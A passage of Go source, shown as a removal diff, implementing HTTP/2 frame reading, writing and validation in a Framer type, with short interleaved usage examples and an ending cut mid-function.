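			saved := append([]byte(nil), df.Data()...)
			log.Printf("DATA on stream %d: %d bytes", df.StreamID, len(saved))
		}
	}
}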
-func (fr *Framer) SetReuseFrames() { - if fr.frameCache != nil { - return - } - fr.frameCache = &frameCache{} -} - -type frameCache struct { - dataFrame DataFrame -} - -func (fc *frameCache) getDataFrame() *DataFrame { - if fc == nil { - return &DataFrame{} - } - return &fc.dataFrame -} - -// NewFramer returns a Framer that writes frames to w and reads them from r. -func NewFramer(w io.Writer, r io.Reader) *Framer { - fr := &Framer{ - w: w, - r: r, - logReads: logFrameReads, - logWrites: logFrameWrites, - debugReadLoggerf: log.Printf, - debugWriteLoggerf: log.Printf, - } - fr.getReadBuf = func(size uint32) []byte { - if cap(fr.readBuf) >= int(size) { - return fr.readBuf[:size] - } - fr.readBuf = make([]byte, size) - return fr.readBuf - } - fr.SetMaxReadFrameSize(maxFrameSize) - return fr -} - -// SetMaxReadFrameSize sets the maximum size of a frame -// that will be read by a subsequent call to ReadFrame. -// It is the caller's responsibility to advertise this -// limit with a SETTINGS frame. -func (fr *Framer) SetMaxReadFrameSize(v uint32) { - if v > maxFrameSize { - v = maxFrameSize - } - fr.maxReadSize = v -} - -// ErrorDetail returns a more detailed error of the last error -// returned by Framer.ReadFrame. For instance, if ReadFrame -// returns a StreamError with code PROTOCOL_ERROR, ErrorDetail -// will say exactly what was invalid. ErrorDetail is not guaranteed -// to return a non-nil value and like the rest of the http2 package, -// its return value is not protected by an API compatibility promise. -// ErrorDetail is reset after the next call to ReadFrame. -func (fr *Framer) ErrorDetail() error { - return fr.errDetail -} - -// ErrFrameTooLarge is returned from Framer.ReadFrame when the peer -// sends a frame that is larger than declared with SetMaxReadFrameSize. -var ErrFrameTooLarge = errors.New("http2: frame too large") - -// terminalReadFrameError reports whether err is an unrecoverable -// error from ReadFrame and no other frames should be read. -func terminalReadFrameError(err error) bool { - if _, ok := err.(StreamError); ok { - return false - } - return err != nil -} - -// ReadFrame reads a single frame. The returned Frame is only valid -// until the next call to ReadFrame. -// -// If the frame is larger than previously set with SetMaxReadFrameSize, the -// returned error is ErrFrameTooLarge. Other errors may be of type -// ConnectionError, StreamError, or anything else from the underlying -// reader. -func (fr *Framer) ReadFrame() (Frame, error) { - fr.errDetail = nil - if fr.lastFrame != nil { - fr.lastFrame.invalidate() - } - fh, err := readFrameHeader(fr.headerBuf[:], fr.r) - if err != nil { - return nil, err - } - if fh.Length > fr.maxReadSize { - return nil, ErrFrameTooLarge - } - payload := fr.getReadBuf(fh.Length) - if _, err := io.ReadFull(fr.r, payload); err != nil { - return nil, err - } - f, err := typeFrameParser(fh.Type)(fr.frameCache, fh, payload) - if err != nil { - if ce, ok := err.(connError); ok { - return nil, fr.connError(ce.Code, ce.Reason) - } - return nil, err - } - if err := fr.checkFrameOrder(f); err != nil { - return nil, err - } - if fr.logReads { - fr.debugReadLoggerf("http2: Framer %p: read %v", fr, summarizeFrame(f)) - } - if fh.Type == FrameHeaders && fr.ReadMetaHeaders != nil { - return fr.readMetaFrame(f.(*HeadersFrame)) - } - return f, nil -} - -// connError returns ConnectionError(code) but first -// stashes away a public reason to the caller can optionally relay it -// to the peer before hanging up on them. 
This might help others debug -// their implementations. -func (fr *Framer) connError(code ErrCode, reason string) error { - fr.errDetail = errors.New(reason) - return ConnectionError(code) -} - -// checkFrameOrder reports an error if f is an invalid frame to return -// next from ReadFrame. Mostly it checks whether HEADERS and -// CONTINUATION frames are contiguous. -func (fr *Framer) checkFrameOrder(f Frame) error { - last := fr.lastFrame - fr.lastFrame = f - if fr.AllowIllegalReads { - return nil - } - - fh := f.Header() - if fr.lastHeaderStream != 0 { - if fh.Type != FrameContinuation { - return fr.connError(ErrCodeProtocol, - fmt.Sprintf("got %s for stream %d; expected CONTINUATION following %s for stream %d", - fh.Type, fh.StreamID, - last.Header().Type, fr.lastHeaderStream)) - } - if fh.StreamID != fr.lastHeaderStream { - return fr.connError(ErrCodeProtocol, - fmt.Sprintf("got CONTINUATION for stream %d; expected stream %d", - fh.StreamID, fr.lastHeaderStream)) - } - } else if fh.Type == FrameContinuation { - return fr.connError(ErrCodeProtocol, fmt.Sprintf("unexpected CONTINUATION for stream %d", fh.StreamID)) - } - - switch fh.Type { - case FrameHeaders, FrameContinuation: - if fh.Flags.Has(FlagHeadersEndHeaders) { - fr.lastHeaderStream = 0 - } else { - fr.lastHeaderStream = fh.StreamID - } - } - - return nil -} - -// A DataFrame conveys arbitrary, variable-length sequences of octets -// associated with a stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.1 -type DataFrame struct { - FrameHeader - data []byte -} - -func (f *DataFrame) StreamEnded() bool { - return f.FrameHeader.Flags.Has(FlagDataEndStream) -} - -// Data returns the frame's data octets, not including any padding -// size byte or padding suffix bytes. -// The caller must not retain the returned memory past the next -// call to ReadFrame. -func (f *DataFrame) Data() []byte { - f.checkValid() - return f.data -} - -func parseDataFrame(fc *frameCache, fh FrameHeader, payload []byte) (Frame, error) { - if fh.StreamID == 0 { - // DATA frames MUST be associated with a stream. If a - // DATA frame is received whose stream identifier - // field is 0x0, the recipient MUST respond with a - // connection error (Section 5.4.1) of type - // PROTOCOL_ERROR. - return nil, connError{ErrCodeProtocol, "DATA frame with stream ID 0"} - } - f := fc.getDataFrame() - f.FrameHeader = fh - - var padSize byte - if fh.Flags.Has(FlagDataPadded) { - var err error - payload, padSize, err = readByte(payload) - if err != nil { - return nil, err - } - } - if int(padSize) > len(payload) { - // If the length of the padding is greater than the - // length of the frame payload, the recipient MUST - // treat this as a connection error. - // Filed: https://github.com/http2/http2-spec/issues/610 - return nil, connError{ErrCodeProtocol, "pad size larger than data payload"} - } - f.data = payload[:len(payload)-int(padSize)] - return f, nil -} - -var ( - errStreamID = errors.New("invalid stream ID") - errDepStreamID = errors.New("invalid dependent stream ID") - errPadLength = errors.New("pad length too large") - errPadBytes = errors.New("padding bytes must all be zeros unless AllowIllegalWrites is enabled") -) - -func validStreamIDOrZero(streamID uint32) bool { - return streamID&(1<<31) == 0 -} - -func validStreamID(streamID uint32) bool { - return streamID != 0 && streamID&(1<<31) == 0 -} - -// WriteData writes a DATA frame. -// -// It will perform exactly one Write to the underlying Writer. 
-// It is the caller's responsibility not to violate the maximum frame size -// and to not call other Write methods concurrently. -func (f *Framer) WriteData(streamID uint32, endStream bool, data []byte) error { - return f.WriteDataPadded(streamID, endStream, data, nil) -} - -// WriteData writes a DATA frame with optional padding. -// -// If pad is nil, the padding bit is not sent. -// The length of pad must not exceed 255 bytes. -// The bytes of pad must all be zero, unless f.AllowIllegalWrites is set. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility not to violate the maximum frame size -// and to not call other Write methods concurrently. -func (f *Framer) WriteDataPadded(streamID uint32, endStream bool, data, pad []byte) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - if len(pad) > 0 { - if len(pad) > 255 { - return errPadLength - } - if !f.AllowIllegalWrites { - for _, b := range pad { - if b != 0 { - // "Padding octets MUST be set to zero when sending." - return errPadBytes - } - } - } - } - var flags Flags - if endStream { - flags |= FlagDataEndStream - } - if pad != nil { - flags |= FlagDataPadded - } - f.startWrite(FrameData, flags, streamID) - if pad != nil { - f.wbuf = append(f.wbuf, byte(len(pad))) - } - f.wbuf = append(f.wbuf, data...) - f.wbuf = append(f.wbuf, pad...) - return f.endWrite() -} - -// A SettingsFrame conveys configuration parameters that affect how -// endpoints communicate, such as preferences and constraints on peer -// behavior. -// -// See http://http2.github.io/http2-spec/#SETTINGS -type SettingsFrame struct { - FrameHeader - p []byte -} - -func parseSettingsFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if fh.Flags.Has(FlagSettingsAck) && fh.Length > 0 { - // When this (ACK 0x1) bit is set, the payload of the - // SETTINGS frame MUST be empty. Receipt of a - // SETTINGS frame with the ACK flag set and a length - // field value other than 0 MUST be treated as a - // connection error (Section 5.4.1) of type - // FRAME_SIZE_ERROR. - return nil, ConnectionError(ErrCodeFrameSize) - } - if fh.StreamID != 0 { - // SETTINGS frames always apply to a connection, - // never a single stream. The stream identifier for a - // SETTINGS frame MUST be zero (0x0). If an endpoint - // receives a SETTINGS frame whose stream identifier - // field is anything other than 0x0, the endpoint MUST - // respond with a connection error (Section 5.4.1) of - // type PROTOCOL_ERROR. - return nil, ConnectionError(ErrCodeProtocol) - } - if len(p)%6 != 0 { - // Expecting even number of 6 byte settings. - return nil, ConnectionError(ErrCodeFrameSize) - } - f := &SettingsFrame{FrameHeader: fh, p: p} - if v, ok := f.Value(SettingInitialWindowSize); ok && v > (1<<31)-1 { - // Values above the maximum flow control window size of 2^31 - 1 MUST - // be treated as a connection error (Section 5.4.1) of type - // FLOW_CONTROL_ERROR. - return nil, ConnectionError(ErrCodeFlowControl) - } - return f, nil -} - -func (f *SettingsFrame) IsAck() bool { - return f.FrameHeader.Flags.Has(FlagSettingsAck) -} - -func (f *SettingsFrame) Value(s SettingID) (v uint32, ok bool) { - f.checkValid() - buf := f.p - for len(buf) > 0 { - settingID := SettingID(binary.BigEndian.Uint16(buf[:2])) - if settingID == s { - return binary.BigEndian.Uint32(buf[2:6]), true - } - buf = buf[6:] - } - return 0, false -} - -// ForeachSetting runs fn for each setting. -// It stops and returns the first error. 
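// A small assumed example (not from the removed file) of the SETTINGS helpers documented
// above: advertise two settings, then iterate the peer's SETTINGS frame with
// ForeachSetting and acknowledge it. "fr" is an assumed *http2.Framer already attached to
// a connection; the chosen setting values are arbitrary.
package example

import (
	"log"

	"golang.org/x/net/http2"
)

func exchangeSettings(fr *http2.Framer) error {
	// Advertise our own preferences first.
	if err := fr.WriteSettings(
		http2.Setting{ID: http2.SettingInitialWindowSize, Val: 1 << 20},
		http2.Setting{ID: http2.SettingMaxFrameSize, Val: 1 << 14},
	); err != nil {
		return err
	}
	f, err := fr.ReadFrame()
	if err != nil {
		return err
	}
	if sf, ok := f.(*http2.SettingsFrame); ok && !sf.IsAck() {
		_ = sf.ForeachSetting(func(s http2.Setting) error {
			log.Printf("peer setting %v = %v", s.ID, s.Val)
			return nil
		})
		return fr.WriteSettingsAck()
	}
	return nil
}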
-func (f *SettingsFrame) ForeachSetting(fn func(Setting) error) error { - f.checkValid() - buf := f.p - for len(buf) > 0 { - if err := fn(Setting{ - SettingID(binary.BigEndian.Uint16(buf[:2])), - binary.BigEndian.Uint32(buf[2:6]), - }); err != nil { - return err - } - buf = buf[6:] - } - return nil -} - -// WriteSettings writes a SETTINGS frame with zero or more settings -// specified and the ACK bit not set. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteSettings(settings ...Setting) error { - f.startWrite(FrameSettings, 0, 0) - for _, s := range settings { - f.writeUint16(uint16(s.ID)) - f.writeUint32(s.Val) - } - return f.endWrite() -} - -// WriteSettingsAck writes an empty SETTINGS frame with the ACK bit set. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteSettingsAck() error { - f.startWrite(FrameSettings, FlagSettingsAck, 0) - return f.endWrite() -} - -// A PingFrame is a mechanism for measuring a minimal round trip time -// from the sender, as well as determining whether an idle connection -// is still functional. -// See http://http2.github.io/http2-spec/#rfc.section.6.7 -type PingFrame struct { - FrameHeader - Data [8]byte -} - -func (f *PingFrame) IsAck() bool { return f.Flags.Has(FlagPingAck) } - -func parsePingFrame(_ *frameCache, fh FrameHeader, payload []byte) (Frame, error) { - if len(payload) != 8 { - return nil, ConnectionError(ErrCodeFrameSize) - } - if fh.StreamID != 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - f := &PingFrame{FrameHeader: fh} - copy(f.Data[:], payload) - return f, nil -} - -func (f *Framer) WritePing(ack bool, data [8]byte) error { - var flags Flags - if ack { - flags = FlagPingAck - } - f.startWrite(FramePing, flags, 0) - f.writeBytes(data[:]) - return f.endWrite() -} - -// A GoAwayFrame informs the remote peer to stop creating streams on this connection. -// See http://http2.github.io/http2-spec/#rfc.section.6.8 -type GoAwayFrame struct { - FrameHeader - LastStreamID uint32 - ErrCode ErrCode - debugData []byte -} - -// DebugData returns any debug data in the GOAWAY frame. Its contents -// are not defined. -// The caller must not retain the returned memory past the next -// call to ReadFrame. -func (f *GoAwayFrame) DebugData() []byte { - f.checkValid() - return f.debugData -} - -func parseGoAwayFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if fh.StreamID != 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - if len(p) < 8 { - return nil, ConnectionError(ErrCodeFrameSize) - } - return &GoAwayFrame{ - FrameHeader: fh, - LastStreamID: binary.BigEndian.Uint32(p[:4]) & (1<<31 - 1), - ErrCode: ErrCode(binary.BigEndian.Uint32(p[4:8])), - debugData: p[8:], - }, nil -} - -func (f *Framer) WriteGoAway(maxStreamID uint32, code ErrCode, debugData []byte) error { - f.startWrite(FrameGoAway, 0, 0) - f.writeUint32(maxStreamID & (1<<31 - 1)) - f.writeUint32(uint32(code)) - f.writeBytes(debugData) - return f.endWrite() -} - -// An UnknownFrame is the frame type returned when the frame type is unknown -// or no specific frame type parser exists. -type UnknownFrame struct { - FrameHeader - p []byte -} - -// Payload returns the frame's payload (after the header). 
It is not -// valid to call this method after a subsequent call to -// Framer.ReadFrame, nor is it valid to retain the returned slice. -// The memory is owned by the Framer and is invalidated when the next -// frame is read. -func (f *UnknownFrame) Payload() []byte { - f.checkValid() - return f.p -} - -func parseUnknownFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - return &UnknownFrame{fh, p}, nil -} - -// A WindowUpdateFrame is used to implement flow control. -// See http://http2.github.io/http2-spec/#rfc.section.6.9 -type WindowUpdateFrame struct { - FrameHeader - Increment uint32 // never read with high bit set -} - -func parseWindowUpdateFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if len(p) != 4 { - return nil, ConnectionError(ErrCodeFrameSize) - } - inc := binary.BigEndian.Uint32(p[:4]) & 0x7fffffff // mask off high reserved bit - if inc == 0 { - // A receiver MUST treat the receipt of a - // WINDOW_UPDATE frame with an flow control window - // increment of 0 as a stream error (Section 5.4.2) of - // type PROTOCOL_ERROR; errors on the connection flow - // control window MUST be treated as a connection - // error (Section 5.4.1). - if fh.StreamID == 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - return nil, streamError(fh.StreamID, ErrCodeProtocol) - } - return &WindowUpdateFrame{ - FrameHeader: fh, - Increment: inc, - }, nil -} - -// WriteWindowUpdate writes a WINDOW_UPDATE frame. -// The increment value must be between 1 and 2,147,483,647, inclusive. -// If the Stream ID is zero, the window update applies to the -// connection as a whole. -func (f *Framer) WriteWindowUpdate(streamID, incr uint32) error { - // "The legal range for the increment to the flow control window is 1 to 2^31-1 (2,147,483,647) octets." - if (incr < 1 || incr > 2147483647) && !f.AllowIllegalWrites { - return errors.New("illegal window increment value") - } - f.startWrite(FrameWindowUpdate, 0, streamID) - f.writeUint32(incr) - return f.endWrite() -} - -// A HeadersFrame is used to open a stream and additionally carries a -// header block fragment. -type HeadersFrame struct { - FrameHeader - - // Priority is set if FlagHeadersPriority is set in the FrameHeader. - Priority PriorityParam - - headerFragBuf []byte // not owned -} - -func (f *HeadersFrame) HeaderBlockFragment() []byte { - f.checkValid() - return f.headerFragBuf -} - -func (f *HeadersFrame) HeadersEnded() bool { - return f.FrameHeader.Flags.Has(FlagHeadersEndHeaders) -} - -func (f *HeadersFrame) StreamEnded() bool { - return f.FrameHeader.Flags.Has(FlagHeadersEndStream) -} - -func (f *HeadersFrame) HasPriority() bool { - return f.FrameHeader.Flags.Has(FlagHeadersPriority) -} - -func parseHeadersFrame(_ *frameCache, fh FrameHeader, p []byte) (_ Frame, err error) { - hf := &HeadersFrame{ - FrameHeader: fh, - } - if fh.StreamID == 0 { - // HEADERS frames MUST be associated with a stream. If a HEADERS frame - // is received whose stream identifier field is 0x0, the recipient MUST - // respond with a connection error (Section 5.4.1) of type - // PROTOCOL_ERROR. 
- return nil, connError{ErrCodeProtocol, "HEADERS frame with stream ID 0"} - } - var padLength uint8 - if fh.Flags.Has(FlagHeadersPadded) { - if p, padLength, err = readByte(p); err != nil { - return - } - } - if fh.Flags.Has(FlagHeadersPriority) { - var v uint32 - p, v, err = readUint32(p) - if err != nil { - return nil, err - } - hf.Priority.StreamDep = v & 0x7fffffff - hf.Priority.Exclusive = (v != hf.Priority.StreamDep) // high bit was set - p, hf.Priority.Weight, err = readByte(p) - if err != nil { - return nil, err - } - } - if len(p)-int(padLength) <= 0 { - return nil, streamError(fh.StreamID, ErrCodeProtocol) - } - hf.headerFragBuf = p[:len(p)-int(padLength)] - return hf, nil -} - -// HeadersFrameParam are the parameters for writing a HEADERS frame. -type HeadersFrameParam struct { - // StreamID is the required Stream ID to initiate. - StreamID uint32 - // BlockFragment is part (or all) of a Header Block. - BlockFragment []byte - - // EndStream indicates that the header block is the last that - // the endpoint will send for the identified stream. Setting - // this flag causes the stream to enter one of "half closed" - // states. - EndStream bool - - // EndHeaders indicates that this frame contains an entire - // header block and is not followed by any - // CONTINUATION frames. - EndHeaders bool - - // PadLength is the optional number of bytes of zeros to add - // to this frame. - PadLength uint8 - - // Priority, if non-zero, includes stream priority information - // in the HEADER frame. - Priority PriorityParam -} - -// WriteHeaders writes a single HEADERS frame. -// -// This is a low-level header writing method. Encoding headers and -// splitting them into any necessary CONTINUATION frames is handled -// elsewhere. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteHeaders(p HeadersFrameParam) error { - if !validStreamID(p.StreamID) && !f.AllowIllegalWrites { - return errStreamID - } - var flags Flags - if p.PadLength != 0 { - flags |= FlagHeadersPadded - } - if p.EndStream { - flags |= FlagHeadersEndStream - } - if p.EndHeaders { - flags |= FlagHeadersEndHeaders - } - if !p.Priority.IsZero() { - flags |= FlagHeadersPriority - } - f.startWrite(FrameHeaders, flags, p.StreamID) - if p.PadLength != 0 { - f.writeByte(p.PadLength) - } - if !p.Priority.IsZero() { - v := p.Priority.StreamDep - if !validStreamIDOrZero(v) && !f.AllowIllegalWrites { - return errDepStreamID - } - if p.Priority.Exclusive { - v |= 1 << 31 - } - f.writeUint32(v) - f.writeByte(p.Priority.Weight) - } - f.wbuf = append(f.wbuf, p.BlockFragment...) - f.wbuf = append(f.wbuf, padZeros[:p.PadLength]...) - return f.endWrite() -} - -// A PriorityFrame specifies the sender-advised priority of a stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.3 -type PriorityFrame struct { - FrameHeader - PriorityParam -} - -// PriorityParam are the stream prioritzation parameters. -type PriorityParam struct { - // StreamDep is a 31-bit stream identifier for the - // stream that this stream depends on. Zero means no - // dependency. - StreamDep uint32 - - // Exclusive is whether the dependency is exclusive. - Exclusive bool - - // Weight is the stream's zero-indexed weight. It should be - // set together with StreamDep, or neither should be set. Per - // the spec, "Add one to the value to obtain a weight between - // 1 and 256." 
- Weight uint8 -} - -func (p PriorityParam) IsZero() bool { - return p == PriorityParam{} -} - -func parsePriorityFrame(_ *frameCache, fh FrameHeader, payload []byte) (Frame, error) { - if fh.StreamID == 0 { - return nil, connError{ErrCodeProtocol, "PRIORITY frame with stream ID 0"} - } - if len(payload) != 5 { - return nil, connError{ErrCodeFrameSize, fmt.Sprintf("PRIORITY frame payload size was %d; want 5", len(payload))} - } - v := binary.BigEndian.Uint32(payload[:4]) - streamID := v & 0x7fffffff // mask off high bit - return &PriorityFrame{ - FrameHeader: fh, - PriorityParam: PriorityParam{ - Weight: payload[4], - StreamDep: streamID, - Exclusive: streamID != v, // was high bit set? - }, - }, nil -} - -// WritePriority writes a PRIORITY frame. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WritePriority(streamID uint32, p PriorityParam) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - if !validStreamIDOrZero(p.StreamDep) { - return errDepStreamID - } - f.startWrite(FramePriority, 0, streamID) - v := p.StreamDep - if p.Exclusive { - v |= 1 << 31 - } - f.writeUint32(v) - f.writeByte(p.Weight) - return f.endWrite() -} - -// A RSTStreamFrame allows for abnormal termination of a stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.4 -type RSTStreamFrame struct { - FrameHeader - ErrCode ErrCode -} - -func parseRSTStreamFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if len(p) != 4 { - return nil, ConnectionError(ErrCodeFrameSize) - } - if fh.StreamID == 0 { - return nil, ConnectionError(ErrCodeProtocol) - } - return &RSTStreamFrame{fh, ErrCode(binary.BigEndian.Uint32(p[:4]))}, nil -} - -// WriteRSTStream writes a RST_STREAM frame. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteRSTStream(streamID uint32, code ErrCode) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - f.startWrite(FrameRSTStream, 0, streamID) - f.writeUint32(uint32(code)) - return f.endWrite() -} - -// A ContinuationFrame is used to continue a sequence of header block fragments. -// See http://http2.github.io/http2-spec/#rfc.section.6.10 -type ContinuationFrame struct { - FrameHeader - headerFragBuf []byte -} - -func parseContinuationFrame(_ *frameCache, fh FrameHeader, p []byte) (Frame, error) { - if fh.StreamID == 0 { - return nil, connError{ErrCodeProtocol, "CONTINUATION frame with stream ID 0"} - } - return &ContinuationFrame{fh, p}, nil -} - -func (f *ContinuationFrame) HeaderBlockFragment() []byte { - f.checkValid() - return f.headerFragBuf -} - -func (f *ContinuationFrame) HeadersEnded() bool { - return f.FrameHeader.Flags.Has(FlagContinuationEndHeaders) -} - -// WriteContinuation writes a CONTINUATION frame. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WriteContinuation(streamID uint32, endHeaders bool, headerBlockFragment []byte) error { - if !validStreamID(streamID) && !f.AllowIllegalWrites { - return errStreamID - } - var flags Flags - if endHeaders { - flags |= FlagContinuationEndHeaders - } - f.startWrite(FrameContinuation, flags, streamID) - f.wbuf = append(f.wbuf, headerBlockFragment...) 
- return f.endWrite() -} - -// A PushPromiseFrame is used to initiate a server stream. -// See http://http2.github.io/http2-spec/#rfc.section.6.6 -type PushPromiseFrame struct { - FrameHeader - PromiseID uint32 - headerFragBuf []byte // not owned -} - -func (f *PushPromiseFrame) HeaderBlockFragment() []byte { - f.checkValid() - return f.headerFragBuf -} - -func (f *PushPromiseFrame) HeadersEnded() bool { - return f.FrameHeader.Flags.Has(FlagPushPromiseEndHeaders) -} - -func parsePushPromise(_ *frameCache, fh FrameHeader, p []byte) (_ Frame, err error) { - pp := &PushPromiseFrame{ - FrameHeader: fh, - } - if pp.StreamID == 0 { - // PUSH_PROMISE frames MUST be associated with an existing, - // peer-initiated stream. The stream identifier of a - // PUSH_PROMISE frame indicates the stream it is associated - // with. If the stream identifier field specifies the value - // 0x0, a recipient MUST respond with a connection error - // (Section 5.4.1) of type PROTOCOL_ERROR. - return nil, ConnectionError(ErrCodeProtocol) - } - // The PUSH_PROMISE frame includes optional padding. - // Padding fields and flags are identical to those defined for DATA frames - var padLength uint8 - if fh.Flags.Has(FlagPushPromisePadded) { - if p, padLength, err = readByte(p); err != nil { - return - } - } - - p, pp.PromiseID, err = readUint32(p) - if err != nil { - return - } - pp.PromiseID = pp.PromiseID & (1<<31 - 1) - - if int(padLength) > len(p) { - // like the DATA frame, error out if padding is longer than the body. - return nil, ConnectionError(ErrCodeProtocol) - } - pp.headerFragBuf = p[:len(p)-int(padLength)] - return pp, nil -} - -// PushPromiseParam are the parameters for writing a PUSH_PROMISE frame. -type PushPromiseParam struct { - // StreamID is the required Stream ID to initiate. - StreamID uint32 - - // PromiseID is the required Stream ID which this - // Push Promises - PromiseID uint32 - - // BlockFragment is part (or all) of a Header Block. - BlockFragment []byte - - // EndHeaders indicates that this frame contains an entire - // header block and is not followed by any - // CONTINUATION frames. - EndHeaders bool - - // PadLength is the optional number of bytes of zeros to add - // to this frame. - PadLength uint8 -} - -// WritePushPromise writes a single PushPromise Frame. -// -// As with Header Frames, This is the low level call for writing -// individual frames. Continuation frames are handled elsewhere. -// -// It will perform exactly one Write to the underlying Writer. -// It is the caller's responsibility to not call other Write methods concurrently. -func (f *Framer) WritePushPromise(p PushPromiseParam) error { - if !validStreamID(p.StreamID) && !f.AllowIllegalWrites { - return errStreamID - } - var flags Flags - if p.PadLength != 0 { - flags |= FlagPushPromisePadded - } - if p.EndHeaders { - flags |= FlagPushPromiseEndHeaders - } - f.startWrite(FramePushPromise, flags, p.StreamID) - if p.PadLength != 0 { - f.writeByte(p.PadLength) - } - if !validStreamID(p.PromiseID) && !f.AllowIllegalWrites { - return errStreamID - } - f.writeUint32(p.PromiseID) - f.wbuf = append(f.wbuf, p.BlockFragment...) - f.wbuf = append(f.wbuf, padZeros[:p.PadLength]...) - return f.endWrite() -} - -// WriteRawFrame writes a raw frame. This can be used to write -// extension frames unknown to this package. 
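// An assumed illustration (not part of the removed file) of the raw-frame escape hatch
// documented above: send a frame type this package does not know about, which a peer
// reading with the same package would surface as an *http2.UnknownFrame. The 0xfa type
// value and the payload are arbitrary; "fr" is an assumed *http2.Framer.
package example

import "golang.org/x/net/http2"

func sendExtensionFrame(fr *http2.Framer, streamID uint32) error {
	const extType = http2.FrameType(0xfa) // not one of the ten standard frame types
	payload := []byte("experimental extension payload")
	return fr.WriteRawFrame(extType, 0, streamID, payload)
}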
-func (f *Framer) WriteRawFrame(t FrameType, flags Flags, streamID uint32, payload []byte) error { - f.startWrite(t, flags, streamID) - f.writeBytes(payload) - return f.endWrite() -} - -func readByte(p []byte) (remain []byte, b byte, err error) { - if len(p) == 0 { - return nil, 0, io.ErrUnexpectedEOF - } - return p[1:], p[0], nil -} - -func readUint32(p []byte) (remain []byte, v uint32, err error) { - if len(p) < 4 { - return nil, 0, io.ErrUnexpectedEOF - } - return p[4:], binary.BigEndian.Uint32(p[:4]), nil -} - -type streamEnder interface { - StreamEnded() bool -} - -type headersEnder interface { - HeadersEnded() bool -} - -type headersOrContinuation interface { - headersEnder - HeaderBlockFragment() []byte -} - -// A MetaHeadersFrame is the representation of one HEADERS frame and -// zero or more contiguous CONTINUATION frames and the decoding of -// their HPACK-encoded contents. -// -// This type of frame does not appear on the wire and is only returned -// by the Framer when Framer.ReadMetaHeaders is set. -type MetaHeadersFrame struct { - *HeadersFrame - - // Fields are the fields contained in the HEADERS and - // CONTINUATION frames. The underlying slice is owned by the - // Framer and must not be retained after the next call to - // ReadFrame. - // - // Fields are guaranteed to be in the correct http2 order and - // not have unknown pseudo header fields or invalid header - // field names or values. Required pseudo header fields may be - // missing, however. Use the MetaHeadersFrame.Pseudo accessor - // method access pseudo headers. - Fields []hpack.HeaderField - - // Truncated is whether the max header list size limit was hit - // and Fields is incomplete. The hpack decoder state is still - // valid, however. - Truncated bool -} - -// PseudoValue returns the given pseudo header field's value. -// The provided pseudo field should not contain the leading colon. -func (mh *MetaHeadersFrame) PseudoValue(pseudo string) string { - for _, hf := range mh.Fields { - if !hf.IsPseudo() { - return "" - } - if hf.Name[1:] == pseudo { - return hf.Value - } - } - return "" -} - -// RegularFields returns the regular (non-pseudo) header fields of mh. -// The caller does not own the returned slice. -func (mh *MetaHeadersFrame) RegularFields() []hpack.HeaderField { - for i, hf := range mh.Fields { - if !hf.IsPseudo() { - return mh.Fields[i:] - } - } - return nil -} - -// PseudoFields returns the pseudo header fields of mh. -// The caller does not own the returned slice. -func (mh *MetaHeadersFrame) PseudoFields() []hpack.HeaderField { - for i, hf := range mh.Fields { - if !hf.IsPseudo() { - return mh.Fields[:i] - } - } - return mh.Fields -} - -func (mh *MetaHeadersFrame) checkPseudos() error { - var isRequest, isResponse bool - pf := mh.PseudoFields() - for i, hf := range pf { - switch hf.Name { - case ":method", ":path", ":scheme", ":authority": - isRequest = true - case ":status": - isResponse = true - default: - return pseudoHeaderError(hf.Name) - } - // Check for duplicates. - // This would be a bad algorithm, but N is 4. - // And this doesn't allocate. 
- for _, hf2 := range pf[:i] { - if hf.Name == hf2.Name { - return duplicatePseudoHeaderError(hf.Name) - } - } - } - if isRequest && isResponse { - return errMixPseudoHeaderTypes - } - return nil -} - -func (fr *Framer) maxHeaderStringLen() int { - v := fr.maxHeaderListSize() - if uint32(int(v)) == v { - return int(v) - } - // They had a crazy big number for MaxHeaderBytes anyway, - // so give them unlimited header lengths: - return 0 -} - -// readMetaFrame returns 0 or more CONTINUATION frames from fr and -// merge them into into the provided hf and returns a MetaHeadersFrame -// with the decoded hpack values. -func (fr *Framer) readMetaFrame(hf *HeadersFrame) (*MetaHeadersFrame, error) { - if fr.AllowIllegalReads { - return nil, errors.New("illegal use of AllowIllegalReads with ReadMetaHeaders") - } - mh := &MetaHeadersFrame{ - HeadersFrame: hf, - } - var remainSize = fr.maxHeaderListSize() - var sawRegular bool - - var invalid error // pseudo header field errors - hdec := fr.ReadMetaHeaders - hdec.SetEmitEnabled(true) - hdec.SetMaxStringLength(fr.maxHeaderStringLen()) - hdec.SetEmitFunc(func(hf hpack.HeaderField) { - if VerboseLogs && fr.logReads { - fr.debugReadLoggerf("http2: decoded hpack field %+v", hf) - } - if !httplex.ValidHeaderFieldValue(hf.Value) { - invalid = headerFieldValueError(hf.Value) - } - isPseudo := strings.HasPrefix(hf.Name, ":") - if isPseudo { - if sawRegular { - invalid = errPseudoAfterRegular - } - } else { - sawRegular = true - if !validWireHeaderFieldName(hf.Name) { - invalid = headerFieldNameError(hf.Name) - } - } - - if invalid != nil { - hdec.SetEmitEnabled(false) - return - } - - size := hf.Size() - if size > remainSize { - 